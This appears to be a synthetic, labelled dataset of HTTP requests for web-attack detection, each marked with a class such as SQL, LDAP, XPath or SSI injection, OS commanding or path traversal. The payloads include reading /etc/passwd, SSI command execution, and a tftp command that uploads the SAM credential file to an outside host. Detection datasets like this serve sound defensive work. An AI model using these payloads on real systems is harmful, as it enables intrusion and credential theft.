Cookie: j14R=xml:setef1iahT0(;emaeod5rtos=ldmRgN@f;b2vasieoeh=mrcBnHE1Lbv;etIlrxaot9rdUu=0;b3l@bwhereform8HGTa=rRzvk0;t0stSteEe=catap4i
Cookie2: $Version="5"
Date: Wed, 02 Jul 08 19:49:24 CET
ETag: "@j93PQwdpk4Wwma"
Expect: 100-continue
From: eg5n@krsrziBnn.it
If-Modified-Since: Fri, 28 Dec 07 05:17:01 UTC
If-Unmodified-Since: Thu, 30 Mar 06 16:29:33 UTC
If-Match: "V7wcSN_i8QuCP19De"
If-None-Match: *
If-Range: Sat, 03 Apr 04 20:57:29 CET
Max-Forwards: 59
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: senaTy nseaDz=wasioi
Authorization: Basic aUF3c21kYWk6YW1vbkU=
Range: -0418,311-
Referer: /gn5e.rar
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.4 (Machintosh; U; PPC 0.6; yt-tt; rv:7.8.9) Gecko/06135300
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 801x1629
Via: 2.2 www.rEnhm.png, ltuboy/3.9 185.3.153.86, FTP/3.2 www.toobjnTe.shtml
Transfer-Encoding: identity
Upgrade: s2or1r/5.6, unus/0.2, iUp/7.1
Warning: 301 www.ap3wwa.js "xdpCaybu" "Wed, 07 Apr 10 04:27:10 CET"
X-Forwarded-For: 52.147.136.153
X-Serial-Number: 848685
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43451
Start - Id: 48780
class: XPathInjection
GET /Tq/lerbueEm0esiru2irru.asmx?6own=6446+or+++++1%3C++ttkn%2Fnov6%2Furo%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D96%5D+++++or++40%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&ncNHkeotr0hy=pEexw HTTP/1.0
Host: 63.174.26.216
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-2022-kr;q=0.3, iso-2022-kr;q=0.3, iso-8859-9;q=0.0, cp-950, ks_c_5601-1987;q=0.4
Accept-Encoding: 
Accept-Language: e-a
Cache-Control: max-stale
Client-ip: 124.62.208.222
Cookie: c0dM8group bya1=7a;WDqZyQL=iO3;5Tooo=kfTTYUe2l3BU;triheRett=8344977
Cookie2: $Version="91"
Date: Tue, 09 Sep 08 06:02:01 GMT
ETag: "OBU@UM7En1vWUhLG2"
Expect: 100-continue
From: eaa6xs@nsEi2dUOb.uk
If-Modified-Since: Sat, 23 Jul 05 12:12:21 UTC
If-Unmodified-Since: Sat, 01 May 10 03:09:12 CET
If-Match: "F.VxcKC-Wk0lF.m"
If-None-Match: *
If-Range: *
Max-Forwards: 4718
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM dnRyaGhlbHJpbHRndG1uYWh3aWVjZWVtdFNodHJlRHJ0dHNlbnJybnVhYW5oSHQ=
Authorization: etllH 3Ru8ttge=taSgioeb
Range: 512488-28725,-179,34439-
Referer: http://tusagpc.it/uA4inoe/oNfle/eotr.avi
TE: chunked,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: 2wepes/7.8
UA-CPU: Sparc
UA-Disp: 065,1900,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0640x829
Via: 5.0 www.osi2.css, HTTP/0.5 57.113.172.200, HTTP/6.5 223.116.34.88:4
Transfer-Encoding: deflate
Upgrade: dMji/4.6, m1ce/2.1, ittqim/8.3, stojw/5.9, fftt/6.2
Warning: 022 17.182.45.11:3 "otrr6o" "Sun, 18 Jun 06 04:34:44 GMT"
X-Forwarded-For: 29.255.158.60
X-Serial-Number: 265535777881770929
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48780
Start - Id: 36754
class: OsCommanding
GET /1i37G7gETc_/VhYpY0DZE0-5/fdLzVJqTdia_jWOJ/7@WvJukh/so3ut31gtpbnaD/68Imqayt2/aWE6_.24/iRaxXqLI8Vf2z43ORrH/awden4u/n7A_Uy3bTNiI8Tnm/ajlbnxtdaee/Ilib.htm?yd2xer=%7C++cat+..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd+++%7C&tema0=y56&ndqh5=02222 HTTP/1.0
Host: 141.168.216.189
Connection: iuQa
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, deflate
Accept-Language: *;q=0.2
Cache-Control: max-age=6920
Client-ip: 66.186.73.243
Cookie: e6e4WGErnre=heG7efdCnkEobhsp;rogl1Sueoeo=33123701
Cookie2: $Version="786"
Date: Sun, 08 Apr 07 18:39:05 CET
ETag: W/"nq-5AohjOXHMiQfI"
Expect: 100-continue
From: 1Ruwies@Rllsdtnt.st
If-Modified-Since: Wed, 19 May 04 04:29:15 UTC
If-Unmodified-Since: Sun, 03 Aug 08 14:20:54 UTC
If-Match: "AcodqUqxsT1b9Y33"
If-None-Match: "HfjEhsKvvX7hEI24"
If-Range: "XISmt7q2iLSY2FHm"
Max-Forwards: 9261
MIME-Version: 5.1
Pragma: rrne=tmgtw
Proxy-Authorization: Digest response="49a2dbb09A077a8FDd2baA76dAA5E5dd"
Authorization: Digest uri=/s4bleeni/AsitIdO/atwNr/cn7ee.doc
Range: 50-7
Referer: http://www.sSeonif.ch/neake4h/hdcmc.jsp
TE: gzip;q=0.2,chunked;q=0.3
Trailer: From
User-Agent: ae9cyoeo/4.6.7.3
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 232x1783
Via: 5.9 www.bxici.css, FTP/6.7 201.125.173.100, inkn/3.9 234.106.150.30
Transfer-Encoding: deflate
Upgrade: irb6d/8.9, te8/0.6
Warning: 508 www.fetrah.tiff "t7sycuhIpesS" "Wed, 10 Feb 10 05:46:21 GMT"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36754
Start - Id: 49295
class: XPathInjection
GET /ain7ng1wWye0/3_FzTCbinSnc5E3/h6gbFKBdfz-gaK/r6dBA0U24fb3S6S/alocwjutjddncsi/mwWTZiD-C/eNBZsS@qC2cJk6qeqa_/bJjmuTWMFE1a-zDt/b4wuB@ki6OiSw2rW.cgi?2oniqhjqpf=%27&ySZoGQCb=di&Mez=tstwateronre&8semlS=57530&m61Z=rmdnwRwtseic+1oln%24&yaus=ia1%26nay&hk=kodhkf8f3&eliiluaireDmo=753161&jC=83&nfigvt=ren2mnct%29uO1r&epltnverZt2zb=alhWsNCgKM&tsLs8whr=optr&grbEeeutnni=0dnmst5ncy%40&e4pzy3nyIdl=+gihdcg&bzE2cs=52554+++++or+++++1%3C++++sebpt%2FinisEa%2Fk7h%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D5%5D+++or+++++4016%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.1
Host: www.nAtc.biz
Connection: le0asn
Accept: application/x-tar;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: stmtrbp-onShi;q=0.6
Cache-Control: no-cache
Client-ip: 248.142.244.103
Cookie: oann7An3=olue5Tieiaoin;cIeg=l52yKX53;reeIt=67318503;tt7syi=vliavo;nahEon5f=06;tpeSFhbeauxmno=Ot
Cookie2: $Version="213"
Date: Wed, 03 Jun 09 14:28:46 UTC
ETag: "bEGPHp3kJLa_O7u5RC"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Sat, 05 Jun 04 12:46:25 CET
If-Unmodified-Since: Sun, 12 Aug 07 10:15:55 CET
If-Match: "h.EAPtYo7V.8JSq0r"
If-None-Match: "Tv_8_QwBhSU1limYRq8"
If-Range: *
Max-Forwards: 59
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM YmVlaHJpZVNvNXlmamZwYW4xYWRydDdod3Noc3NsT3RrM280aWw=
Authorization: OmthsX Nttea6=9rlenb
Range: 86-1461,597962-028810
Referer: http://rezgji.ch/vniJiita.gif
TE: chunked
Trailer: Trailer
User-Agent: lytsaO/9.2.6.8.5
UA-CPU: PowerPC
UA-Disp: 284,977,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7516x496
Via: 9.8 www.eEeedhct.png, 8.0 44.77.28.226:04
Transfer-Encoding: identity
Upgrade: kefEa/0.4, sicxsn/0.6, oeAol/1.0, tMesla/8.7
Warning: 172 140.116.163.38:5 "oRfa" 
X-Forwarded-For: 137.94.37.177
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49295
Start - Id: 37875
class: LdapInjection
GET /amyIEEAOoIf0CJSg4/aW5F.G/0ITuoradminnk/shGRT-erDxIB/oce/s1LferTeTEnisym/eP/zeI0/Tts9rnc6weh/bf1t/sW_22hk4FL1b3PZyd96w/dOB@Pq2NHl7.NM_MXUDd.pl?pSm3lsaCtS7fn=snmaste&7bih=Ita&iehlbteoarvb8ta=6365363&eiQeoooesenue5t=%40ctuh&ep=or9Nlnlasowrna&Q5my21Z=frpou%29%28++++%7C+++%28um%3D*%29&yua=Utt&Frohrn=u8db1&6JSJpGSnxtermq=iinputo2r%7Cz7aea HTTP/1.1
Host: 43.193.23.143
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic;q=0.1
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: max-stale=9
Client-ip: 243.107.176.204
Cookie: 6c=78;5b1ngchnekpeos=il:adminy|i8gsee0 insert
Cookie2: $Version="671"
Date: Sat, 09 Apr 05 22:39:44 UTC
ETag: W/"pzr-MWT_QI7QEla-I"
Expect: 100-continue
From: ftCe@ttlwnsel.it
If-Modified-Since: Sat, 26 May 07 01:43:39 CET
If-Unmodified-Since: Mon, 08 Oct 07 12:36:40 GMT
If-Match: "j03sBA-skXanwNiI"
If-None-Match: "M9sH0o2P18l28ICX"
If-Range: *
Max-Forwards: 1743
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Atfeo UKet=rucegw
Authorization: mHrk sGamdg=QmliIol
Range: 89-,46-035533,8-609
Referer: /ecmed/aohN/9iypu0ia.swf
TE: trailers,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.1 (compatible; eiFsre3ntY; Win 9x; owtTo4fN; vmooRopi)
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 1.1 178.2.110.138:185, 7.6 www.eepQitop.css, 8.4 231.254.118.238
Transfer-Encoding: compress
Upgrade: Glcnde/7.1, tipm45/0.4, nene/5.9
Warning: 829 201.112.203.99:9152 "tindRfilanlsihtasia" 
X-Forwarded-For: 32.94.96.206
X-Serial-Number: 300384
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37875
Start - Id: 39681
class: SSI
GET /diYedqrGpsgnwge2a/lGL0K.DLQhT3jj3XU/vSqv1zWOs/rstA/ssi/exa.KWuLrPCmqoX1/3hrl/BXwV/Mj2.U8bodys/3ZfEC7XoXCLAG/iyMz2q1Lc_l.swf?jUD5adminUCgX2R=+n&dtgiyWosn=uai+L&Z-kV_T9E=%3C%21--+++++%23include++virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22++--%3E&lpl=9th+ee3895cRLl&L7QmVJm=rlo&rV=I36kof4ioude&boweEtO5O7=7tl2e3sedoE&6iwrS3toTEsasu=auc+aec0mailhttpsc%3Fctrimg-i HTTP/1.0
Host: 163.127.159.145
Connection: coehe
Accept: application/rtf;q=0.6, text/*, text/*
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 17.56.25.243
Cookie: DS_K4yWxmlt=824;h8fe=t]i
Cookie2: $Version="5"
Date: Sun, 05 Jun 05 23:50:07 GMT
ETag: "MnC6RG5yCfdECDak"
Expect: 100-continue
From: g1nes2@zh66rlare.org
If-Modified-Since: Thu, 07 Aug 08 19:56:17 UTC
If-Unmodified-Since: Sun, 24 Sep 06 22:07:04 CET
If-Match: *
If-None-Match: "tfE-Bj7GvTdbVvRkYZrr"
If-Range: Fri, 25 Sep 09 21:58:38 GMT
Max-Forwards: 743
MIME-Version: 9.9
Pragma: iv=yienah
Proxy-Authorization: Digest nonce
Authorization: Digest nc=bfF4DAEf
Range: 1-2703
Referer: /rde8esU/esroleyt.cfm
TE: trailers,trailers
Trailer: User-Agent
User-Agent: dUtICb15 http://www.hliombo.de
UA-CPU: Sparc
UA-Disp: 0266,938,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 726x074
Via: FTP/0.5 www.ttarfotw.png
Transfer-Encoding: gzip
Upgrade: im0/0.0, gln/3.7
Warning: 733 214.19.169.247 "I5ohianit" 
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 9911764547155
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 39681
Start - Id: 45701
class: PathTransversal
GET /oHS0wE-xiz/3PFljt6l01Aqf/h5n5v8/r8UyrpkgwnBkW5mX/zTea8lnpnncBqn/w2istyle8c@vbscriptVu7s1/sehdi/66qVusr/m6gZQn/gioanbutea.php4?Vz79dy=tqNzyLlFNT&aeot=2rn&teeAqadai=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini&dwuted=jtRaewsC%7Cctcr HTTP/1.1
Host: 58.10.160.59
Connection: r6soazY
Accept: audio/basic;q=0.1, video/mpeg, text/html;q=0.2
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: awgsq9g-tzatrs, ine4ttsg-r;q=0.4
Cache-Control: max-age=91368
Client-ip: 8.138.141.106
Cookie: ojaWeob=Lodhzraotae5;lnN=1710;m7smnyx=nsTformofromN  mJ6[ri2i-;ahsildnsr=hinuu
Cookie2: $Version="305"
Date: Tue, 04 Apr 06 18:37:25 UTC
ETag: "uIDDvKIZiH.oR@ZIi6O"
Expect: elywicem=ialbul;etbnuwsp=a7asis9n
From: eajtut@smge.gov
If-Modified-Since: Sun, 23 Apr 06 22:02:53 GMT
If-Unmodified-Since: Mon, 21 Aug 06 24:09:44 GMT
If-Match: "-fiQB7xbz_BH9HJ46"
If-None-Match: "qiF80kR3-EoYQ6D"
If-Range: *
Max-Forwards: 60
MIME-Version: 5.2
Pragma: as='en7p'
Proxy-Authorization: Digest realm
Authorization: Digest username="2ihr3onS"
Range: -934,-807,-703421
Referer: http://www.34od.com/asve/ahtiInn/18cel.gz
TE: chunked;q=0.9,trailers
Trailer: Cache-Control
User-Agent: gee7blsk (eJN9lEKXAK; 500RH-OtH; tn9PHLcEle; iZDz2HXm; mZAc1ElWK)
UA-CPU: Sparc
UA-Disp: 8763,047,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6938x271
Via: 2.5 www.ccnq.shtml, HTTP/8.9 123.77.151.239
Transfer-Encoding: 0zes
Upgrade: sz3/7.1, 6Dnd/4.3
Warning: 288 223.210.181.104 "nzlia9itn3swklmex" "Fri, 29 Apr 05 08:27:02 GMT"
X-Forwarded-For: 147.237.198.55
X-Serial-Number: 1618317
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45701
Start - Id: 40663
class: SSI
GET /rKN8EU9-4A867/trnhtjicobhenu/1mSy/SgsV@bgsoundGbvN/ic5onieremistae/cLHz/6qdkx_-G8uT_@/prdorhMbhd1j/jpWRfs7L/ir0SGqatveSRtwi/wceaf/vpsjlate.tiff?oefe=gt4n8c&1s9eri=417429&hitnrrHoe1d2=gnDmW0Sx4&unotnG=i01unzul9hgNrrgp&rLa262=riEneuseeerc&YN=0xcrwe2Tcntlo&Sof=ezm57w&niebym=%3C%21--+%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++++--%3E&7p7@hrI=7&oyr=rHutomUeaaicrddlab&bcojKmmapidpe=i%40oe%7Credbsctg HTTP/1.1
Host: www.Ayiw.st
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, gzip, compress, gzip;q=0.7, deflate;q=0.6
Accept-Language: *
Cache-Control: phOess='ry'
Client-ip: 248.142.217.61
Cookie: nocmsIas2rn=912324
Cookie2: $Version="0"
Date: Sat, 14 Feb 09 10:48:12 CET
ETag: "ZSKP9aGFodSxvsTRK"
Expect: 100-continue
From: 4dtnvda@6tnlilE.st
If-Modified-Since: Fri, 09 Jan 09 02:28:31 GMT
If-Unmodified-Since: Tue, 06 Nov 07 04:34:22 GMT
If-Match: *
If-None-Match: *
If-Range: "s075@4pi2W1HhDIrfB"
Max-Forwards: 2
MIME-Version: 1.3
Pragma: sl=nG
Authorization: Basic dzhuOXRvOnRsZTFsOWw=
Referer: http://heEiapu.uk/apsle/eb2ni/sptR/seoieysa/vEmoae.nsf
TE: deflate,trailers,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: sA56Gk http://www.ofsst.it
UA-CPU: 68000
UA-Disp: 574,0063,16
UA-Color: color32
Via: e8sord/7.3 www.s9nrlLgi.tiff, ayanoe/8.2 181.132.36.103
Transfer-Encoding: olnood
Upgrade: risQna/2.8, sooR/8.6, loin/4.5, Eydro/8.2, Hdic/5.8
X-Forwarded-For: 151.45.186.240
X-Serial-Number: 9147662078106
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40663
Start - Id: 35099
class: SqlInjection
GET /oe9OnnVfn/3uqit3pai/stdinqFWdocument1XstdinSj/iimgathoiskaotptbeoa/oA6zdVAand0Gd/ddanhteicsqUaf/pDJz1Q/XAmetatelnetoptC7i/w5lvkspi/oburHK3h_94gD/ommp2cntgiicsteia.aspx?Ee7eeqmfjkof=Rrhhdf&otoCretttT9=gnasftr%3Cdepa&xi=ohS4p&aiDTg2fnuefd=en%24ecBaOebp HTTP/1.0
Host: www.yleaa2.biz
Connection: neAl
Accept: */*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.1, deflate;q=0.4, gzip;q=0.4, gzip;q=0.2, deflate
Accept-Language: *
Cache-Control: min-fresh=402
Cookie: dnecBtsnc=' AND    USER_NAME()='iw;eHcviu=iystauRnmo0h6ONhZt;urnglatO=03
Date: Mon, 12 Feb 07 02:22:56 CET
From: a7rwnonc@zeDl.fr
If-Unmodified-Since: Fri, 25 Apr 08 22:14:31 CET
If-Range: Wed, 27 Feb 08 17:50:03 UTC
Max-Forwards: 644
Pragma: no-cache
Proxy-Authorization: 9esniq Uadtnog=kHioniye
Authorization: Digest opaque="bete"
Referer: /goedpc/ithH/o51h/7tee5sea/syrtPt.asmx
TE: trailers,deflate;q=0.7,chunked;q=0.2
User-Agent: 1.8bi7@LNL http://www.zaah.net
UA-Color: color32
Transfer-Encoding: compress
Warning: 874 167.83.202.83 "dOrvOwtenst7t2ivdo7" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35099
Start - Id: 44579
class: OsCommanding
GET /iiqfJLBCPanU-yqd9R/hyannfIOa3s/iqy.msf?eedirnfnbctWeo=iavfj-ItKF&ssi3ntneuan2i=5851609&Pguhtl=188.98.40.133%7C++tftp++++-i+++++131.73.24.129++++PUT+sam._&elcbs9ldka8=5290 HTTP/1.1
Host: 119.77.146.216:2
Connection: lpfiiX
Accept: image/jpeg;q=0.0
Accept-Charset: windows-1253;q=0.0, iso-8859-6;q=0.8, iso-8859-8-i;q=0.0, x-mac-hebrew, isiri-3342
Accept-Encoding: gzip
Accept-Language: dyha-ot;q=0.9, rEc-lb;q=0.4
Cache-Control: min-fresh=9740
Client-ip: 161.135.140.107
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="82"
Date: Tue, 04 Mar 08 24:19:09 GMT
ETag: "5lZWmVQ5I_0NdPW17aq1"
Expect: 100-continue
From: ne1pNm@taromiNse.be
If-Modified-Since: Thu, 11 May 06 09:10:30 UTC
If-Unmodified-Since: Wed, 23 Apr 08 17:01:04 UTC
If-Match: "AKSK2K67PW_WvHrme"
If-None-Match: *
If-Range: "-x@gyRuBYqkDCwoP"
Max-Forwards: 77
MIME-Version: 0.9
Pragma: reqiA='h'
Proxy-Authorization: Digest realm
Authorization: NTLM a2J1cmgzMWhpZW9ubm55aGlCZ2xuZWluanJzQm9zZW5SYXNpYWlwNWVMczBu
Range: 746-,-10102
Referer: /iosN9eo7.php4
TE: trailers,trailers,chunked
Trailer: Via
User-Agent: Mozilla/4.2 (compatible; Konqueror/9.1; Windows NT; j8tslseict; rsefasfdk; 6lIRDris)
Via: HTTP/2.5 31.37.238.229:80545
Transfer-Encoding: deflate
Upgrade: stnat6/0.0
X-Forwarded-For: 84.212.52.145
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44579
Start - Id: 37219
class: LdapInjection
GET /yt/sXjw/tcdceedlltibn8/mF5g/bEtpe0S9/lwlMO/jcKre2Kz6-D.shtml?eti4k=2369562&ak5erkJyz=diepsmgboa&jgleansnqLvw2nh=rohavingm+iot3wnodec&ohi3a=6sn0mfhnneg&Bhehdeh=4slbthe&stqSjteoe=odndxn&deuOsvkve=624%29%28%26%28objectClass%3Dliim%29%28%7C%28sn++%3Dses%29%28cn%3De3d++++J*%29%29&eatmrmanii5venl=aR53&ztrleuii=1224 HTTP/1.0
Host: 95.231.84.188
Connection: keep-alive
Accept: application/*;q=0.0, image/gif;q=0.5, audio/basic
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.8
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 231.33.198.222
Cookie: aubaeit=htdozear;BuaHt4hla0=41
Cookie2: $Version="23"
Date: Fri, 19 Oct 07 12:29:50 UTC
ETag: W/"aiOA_bT2FjQbQV_MlRqi"
Expect: eesgne
From: hsosdtF@auonsc62n.be
If-Modified-Since: Sat, 23 May 09 24:42:34 UTC
If-Unmodified-Since: Sun, 25 Apr 10 23:03:03 GMT
If-Match: "WUclZDkjrH9trt3mOL"
If-None-Match: *
If-Range: Tue, 25 Nov 08 04:24:37 UTC
Max-Forwards: 5877
MIME-Version: 2.4
Pragma: eeli=8a
Proxy-Authorization: NTLM b2Zlc3JlaWRlc3BpcHl0cnRvc2VzbXFoeWVuc2FpYWJ4RUJyVm50dGFlcnJ5OA==
Authorization: tnti rtr3=hloota
Range: 783-
Referer: http://www.a6astl.biz/tss7aku/orutO/oIEp.mpg
TE: gzip,deflate;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/9.3 (X11; U; Open BSD i586 6.5; su-8m; rv:7.6.9) Gecko/41218469
UA-CPU: Sparc
UA-Disp: 4047,0109,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: 2.6 www.etaffMy.shtml:479
Transfer-Encoding: deflate
Upgrade: cleeI/2.9, MCtE/0.6, Tse/6.1, rge/4.6, esEkld/2.9
Warning: 553 www.Nftmdh.html "rnvarnu59oDgV" "Mon, 31 Oct 05 08:57:55 UTC"
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 973297601016037015
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37219
Start - Id: 40311
class: SSI
GET /oLDzA88W.uT9Xrc/3imb8q/asdar25o2adkOtnCttr/dQfOlzsV0/eoxi85Jc1wT76l/njqgNKbTz/y0/.p3-Xfrom6/tenelndS/osd5htstaptaShni9.html?racjwTeadrihs=snc%28&Emo5eevAea=fm%3Doa5gi%24ahuR%24opt%27ygdd&6ti=07&rtWi64satrwct=yedcstdinnpUrag6e7&M15BZbLp=jPl8iG&swanewcsT0euh=33576&WVzY1hF9=e01D&Asv=2r0deletep0%272f&FVe2Qexec.9TM=eviibecReh&ftpeliimotrA=ri%3BTetmpceUts&ia=f4e&SnR6Hj0uk=eqeOMed&nlly7e=6ICArECP&8enpei=%3C%21--+++++%23exec+++++cmd%3D%22c%3A%5Cprogra%7E1%5Cdieeuh6%5Cuostn%5Cdericas.exe++++d%3A%5Cnir%5Cwww.eninrogera.org%5CuLbaEEb%5Cdatabase.mdb++%2Fx+++exporttofoxpro%22--%3E HTTP/1.0
Host: www.t6nTrui.cz
Connection: ojsT
Accept: */*
Accept-Charset: windows-1251;q=0.9, iso-8859-4, iso-8859-3;q=0.7, windows-1258;q=0.8, koi8;q=0.5
Accept-Encoding: compress;q=0.5, gzip
Accept-Language: *
Cache-Control: no-cache
Client-ip: 189.175.1.221
Cookie: irl6hinrk=uxcrkmecsr;eoicmmuydmyltea=ehhih';u4oeyePo4hjTnho=rsaoeeqf?]Ad;JinputH1Kf=r42ed0d
Cookie2: $Version="373"
Date: Mon, 06 Oct 08 14:00:03 GMT
ETag: "r3kUxZs8g68yc5f8L"
Expect: 100-continue
From: eeom@9Ehl.gov
If-Modified-Since: Fri, 20 Feb 09 19:19:36 CET
If-Unmodified-Since: Tue, 03 May 05 20:49:55 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 04 Nov 06 18:07:20 CET
Max-Forwards: 460
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM MTR2dHIxOWJoZWlrZ2huYWVUc2VubjJlYXhnb2k3ZXQ=
Authorization: NTLM YVJzaXJuYXNlb2lubm50TXNlVG5leWF1ZW9sZWFmY3VF
Range: -2115,0045-233,-51
Referer: http://nd7A0.st/kg1b/h9rtrll/wAd0ieh/ts2z9/Tyuebcd.cgi
TE: deflate;q=0.5,chunked;q=0.9,trailers
Trailer: If-None-Match
User-Agent: rroetmeTsiqok
UA-CPU: 68000
UA-Disp: 996,846,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0982x101
Via: 0.3 78.171.60.206
Transfer-Encoding: deflate
Upgrade: llx/6.8, susFt/0.9, sep2er/8.1, fxahr/9.5, oEs/3.3
Warning: 569 252.52.85.196 "izcvnbou" "Wed, 03 May 06 17:08:51 CET"
X-Forwarded-For: 154.142.43.224
X-Serial-Number: 475557970524
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40311
Start - Id: 37809
class: LdapInjection
GET /ew1Um/taatLlRzhkLuc.pl?tsmueecnRAstat=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: www.gAfrein.org:80
Connection: xArtr
Accept: */*
Accept-Charset: windows-1252;q=0.0
Accept-Encoding: *;q=0.8
Accept-Language: ldothna-tvmyv;q=0.1
Cache-Control: max-age=73862
Client-ip: 148.206.211.11
Cookie: yci6teLoeAH=8845
Cookie2: $Version="55"
Date: Thu, 15 Jan 04 17:36:37 UTC
ETag: W/"73onUuR9.zMCXKlol1M"
Expect: lotyoha4=wcDpho;tbh3
From: eiuLl1hr@buwsjfa.cz
If-Modified-Since: Sun, 20 Nov 05 20:20:41 GMT
If-Unmodified-Since: Thu, 23 Apr 09 17:17:29 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 22 Dec 07 24:10:43 GMT
Max-Forwards: 534
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Basic bmVvdDZzOndpdGNvcQ==
Authorization: Basic dDFsUjp4aGVpdA==
Range: -1,56487-
Referer: http://www.izza.gov/gtdtnh.php4
TE: gzip,gzip;q=0.6,gzip
Trailer: Connection
User-Agent: Mozilla/0.9 (compatible; oire; Mac OS X; eo7e)
UA-CPU: x86
UA-Disp: 3820,0444,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2010x029
Via: HTTP/9.1 www.74qads5.css
Transfer-Encoding: identity
Upgrade: ziaeo/3.7, fyav/7.8, dpa0ed/1.0, mfirt/0.2, pSli/6.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 66.215.97.109
X-Serial-Number: 9737658238850824210
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37809
Start - Id: 45162
class: PathTransversal
GET .////////////////////////? HTTP/1.1
Host: 14.195.160.50:35567
Connection: close
Accept: image/*, application/*;q=0.3, application/*;q=0.6
Accept-Charset: iso-8859-5;q=0.3, iso-10646-ucs-2, iso-8859-8-i;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: D44lhwr='cm'
Client-ip: 168.50.166.68
Cookie: cha=yI@5;iddR=ui
Cookie2: $Version="70"
Date: Fri, 20 Feb 04 15:49:13 UTC
ETag: W/"K9MOWNXekAzNeIZ_aEJG"
Expect: 7Eepf5
From: hdOf9re@eutwEh.uk
If-Modified-Since: Wed, 02 Dec 09 06:23:27 GMT
If-Unmodified-Since: Sun, 13 Jul 08 18:52:16 UTC
If-Match: "6YSxMwE7H-dkkCMZ8"
If-None-Match: *
If-Range: Mon, 02 Oct 06 16:27:43 CET
Max-Forwards: 372
MIME-Version: 3.0
Pragma: upgnwx='vssk'
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: o25ra fbeoarR=nHIiirse
Range: 551-3881,-846
Referer: http://www.sofe.uk/roh5/sStr6o/unegs/heT7ytn/kepAH.pdf
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: Mozilla/6.2 (X11; U; Open BSD i586 5.2; xt-aa; rv:0.6.9) Gecko/57847723
UA-Disp: 8494,699,8
UA-OS: Win98
UA-Pixels: 1177x8327
